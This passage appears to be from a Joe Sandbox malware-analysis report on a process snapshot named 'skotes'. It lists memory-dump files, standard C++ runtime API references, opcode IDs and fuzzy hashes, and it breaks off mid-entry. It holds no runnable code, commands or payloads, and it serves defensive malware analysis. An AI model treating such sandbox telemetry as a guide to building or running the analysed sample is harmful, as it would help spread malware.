                                                                                                                                                                • Instruction Fuzzy Hash: C7318D71A006069BCF14EFA9C4919EDFBF1BF48710B5486ADE416A7391DB74AA01CB90
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                • Opcode ID: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction ID: 592f2f7214de587e357e006ea6b28f9e90db438ae3c0b7f788d8437b7c4a2a1a
                                                                                                                                                                • Opcode Fuzzy Hash: e1c45c9dc316a54ae35defc37cb427f3777ab067037c4f36381e4a8f1e2a877e
                                                                                                                                                                • Instruction Fuzzy Hash: E3213175A01119AFDF00EFA4DD81EBEBBB9EF08710F1000A5F501B7291DB309D059BA0
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00BA9C9C
                                                                                                                                                                • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00BA9CE8
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00BA9CFE
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00BA9D6A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2033596534-0
                                                                                                                                                                • Opcode ID: 84e16e52f2e5dd7edd4d49a1da32014e18c9ba7828af1385543391a32b268682
                                                                                                                                                                • Instruction ID: 25c9cbfb67e82b4c33cee6ca6997177a49d8a1f56312b099438a9af389f931a0
                                                                                                                                                                • Opcode Fuzzy Hash: 84e16e52f2e5dd7edd4d49a1da32014e18c9ba7828af1385543391a32b268682
                                                                                                                                                                • Instruction Fuzzy Hash: AC2186769085159FDB05EF64D882DAEB7F4EF06310B2040FAF152AB261EB316E41DB51
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00BAA069
                                                                                                                                                                  • Part of subcall function 00BAB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00BAB5AF
                                                                                                                                                                • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00BAA07F
                                                                                                                                                                • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00BAA0CB
                                                                                                                                                                  • Part of subcall function 00BAAB41: List.LIBCONCRT ref: 00BAAB77
                                                                                                                                                                • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00BAA0DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 932774601-0
                                                                                                                                                                • Opcode ID: b53c57c2f0ac18bf0f6d18651b5f7c1fdd1d28fcb04ede04c1bad927e10b49bf
                                                                                                                                                                • Instruction ID: 0d10bbe1229e041631c1e646d9851bbe47885fb29e1d5097b8d65b0eb5cf084f
                                                                                                                                                                • Opcode Fuzzy Hash: b53c57c2f0ac18bf0f6d18651b5f7c1fdd1d28fcb04ede04c1bad927e10b49bf
                                                                                                                                                                • Instruction Fuzzy Hash: 0621CC32904B149FCB24EF65D9A08ABF3F9FF49700700499EE442A7661DB34F905CBA2
                                                                                                                                                                APIs
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BA4893
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BA48A5
                                                                                                                                                                  • Part of subcall function 00BA5555: _InternalDeleteHelper.LIBCONCRT ref: 00BA5564
                                                                                                                                                                • ListArray.LIBCONCRT ref: 00BA48AF
                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00BA48C8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3844194624-0
                                                                                                                                                                • Opcode ID: 5a4ea33fe6c8319bc4588cb3f7be8959dc7cd6b4cba799dc158c7760d06b2d77
                                                                                                                                                                • Instruction ID: 43cda1ad2fd9a8d35e54c6104925abc9fe82ea5b5a5f7d68fb399efa170ae86c
